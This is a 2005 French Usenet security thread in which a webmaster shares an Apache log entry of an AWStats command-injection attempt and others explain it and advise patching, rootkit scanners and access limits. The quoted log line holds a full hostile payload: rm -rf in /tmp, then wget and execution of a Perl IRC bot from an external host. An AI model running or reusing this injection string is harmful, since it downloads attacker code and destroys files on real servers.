gratifiant > comp.* > comp.securite

Bernard (15/07/2005, 01h37)
Bonjour
J'ai un petit serveur APACHE sous WIndows, pour l'instant.
En analysant mes log apache j'ai remarqué une activité anormale :
213.195.205.243 - - - [14/Jul/2005:18:32:34 +0200] "GET
/stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20www.members.lycos.co.uk/ramona/s;perl%20s;echo%20;rm%20-rf%20s*;echo|
HTTP/1.1" 404 293

Avec l'ami Google, je me suis rendu compte que c'est une tentative
d'intrusion mais pour de l'UNIX (ou LINUX!).

Comme je suis en train de passer à LINUX, je me demande que faire pour se
prémunir de ce genre de situation (paramétrage apache, firewall, ...).

Merci de votre attention
Bernard
Jean-Francois BILLAUD (15/07/2005, 11h56)
scripsit Bernard :

> Bonjour


Bonjour,

> J'ai un petit serveur APACHE sous WIndows, pour l'instant.
> En analysant mes log apache j'ai remarqué une activité anormale :
> 213.195.205.243 - - - [14/Jul/2005:18:32:34 +0200] "GET
> /stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;
> wget%20www.members.lycos.co.uk/ramona/s;perl%20s;echo%20;rm%20-rf%20s*;echo|
> HTTP/1.1" 404 293
> Avec l'ami Google, je me suis rendu compte que c'est une tentative
> d'intrusion mais pour de l'UNIX (ou LINUX!).
> Comme je suis en train de passer à LINUX, je me demande que faire pour se
> prémunir de ce genre de situation (paramétrage apache, firewall, ...).


- lire les alertes de sécurité (s'abonner à la liste d'information mises à jour
ou sécurité de votre distribution) ;
- mettre le système à jour (noyau, logiciel de base) ;
- mettre à jour Apache PHP MySQL ;
- mettre à jour les scripts PHP (c'est probablement le point le plus faible) ;
- utiliser chkrootkit ou rkhunter ;
- lire les logs.

> Merci de votre attention


Pas de quoi.

JFB
Jacques Caron (15/07/2005, 11h56)
Salut,

On 14 Jul 2005 23:37:26 GMT, Bernard <"bfermaut
atfreedotfr"@news53rd.b1.woo> wrote:

> J'ai un petit serveur APACHE sous WIndows, pour l'instant.
> En analysant mes log apache j'ai remarqué une activité anormale :
> 213.195.205.243 - - - [14/Jul/2005:18:32:34 +0200] "GET
> /stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20www.members.lycos.co.uk/ramona/s;perl%20s;echo%20;rm%20-rf%20s*;echo|
> HTTP/1.1" 404 293
> Avec l'ami Google, je me suis rendu compte que c'est une tentative
> d'intrusion mais pour de l'UNIX (ou LINUX!).


Plus précisément, c'est une attaque par code injection sur awstats, qui
est un module de stats pour Apache en perl, qui doit probablement aussi
très bien tourner sous Windows. Ceci dit, pour que l'attaque fonctionne
sous Windows il faudrait que des outils comme rm ou wget soient
disponibles, mais je ne serais pas étonné que certaines distributions de
perl pour Windows le fassent aussi.

> Comme je suis en train de passer à LINUX, je me demande que faire pour se
> prémunir de ce genre de situation (paramétrage apache, firewall, ...).


Mettre à jour awstats...

Jacques.
Delf (15/07/2005, 17h20)
Bernard wrote:

> Comme je suis en train de passer à LINUX, je me demande que faire pour se
> prémunir de ce genre de situation (paramétrage apache, firewall, ...).


N'autoriser l'accès à awStats uniquement en local ?
Clement Lecigne (15/07/2005, 17h20)
On Thu, 14 Jul 2005 23:37:26 +0000, Bernard wrote:

> Bonjour Bonjour,


> (...)
> 213.195.205.243 - - - [14/Jul/2005:18:32:34 +0200] "GET
> /stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20www.members.lycos.co.uk/ramona/s;perl%20s;echo%20;rm%20-rf%20s*;echo|
> HTTP/1.1" 404 293
> Avec l'ami Google, je me suis rendu compte que c'est une tentative
> d'intrusion mais pour de l'UNIX (ou LINUX!).


Pour moi ce n'est pas devenu une activité anormale, des requêtes de ce
genre j'en reçois au moins une tous les 2 jours. Elles proviennent de
worms, de scanneur, ou d'humain ;o).
Dans ce cas, il est question d'exploiter une faille contenue dans AWStats
=< 6.2 qui permet l'execution de commandes à distance
(/stats/awstats.pl?configdir=|cmd|) [1]. Ici le pirate fais le ménage dans
/tmp, télécharge un script perl (),
l'execute puis le supprime. Ce script perl écrit par un italien (cf
commentaires), pour ce que j'ai vu, se cache dans les processus sous
le nom `sh -i', il se connecte sur IRC au réseau undernet sous le nick de
ramonaXXXX sur le canal #goplanet, il peut être alors commandé à partir
d'IRC, on peut lui faire éxecuter divers commandes.
Curieux, je suis aller voir sur ce canal, il y avait une dizaine de
ramonaXXX et autant d'op^Wpirates qui passent leur journée à controler
leur ramona ;o).

> Comme je suis en train de passer à LINUX, je me demande que faire pour
> se prémunir de ce genre de situation (paramétrage apache, firewall,
> ...).


Avoir un système à jour, se tenir au courant des nouvelles vulnérabilités
.... Dans ce cas là, tu n'as aucune crainte à avoir puisque tu n'as pas
d'AWStats qui tournent (du moins pas dans /stats) et donc l'attaque a
échoué comme l'indique l'erreur 404.

> Merci de votre attention
> Bernard


De rien,
Clément.

[1]
jack (05/08/2005, 18h36)
Si qqun a recupere le script perl pour analyse ca m'interesse.
Discussions similaires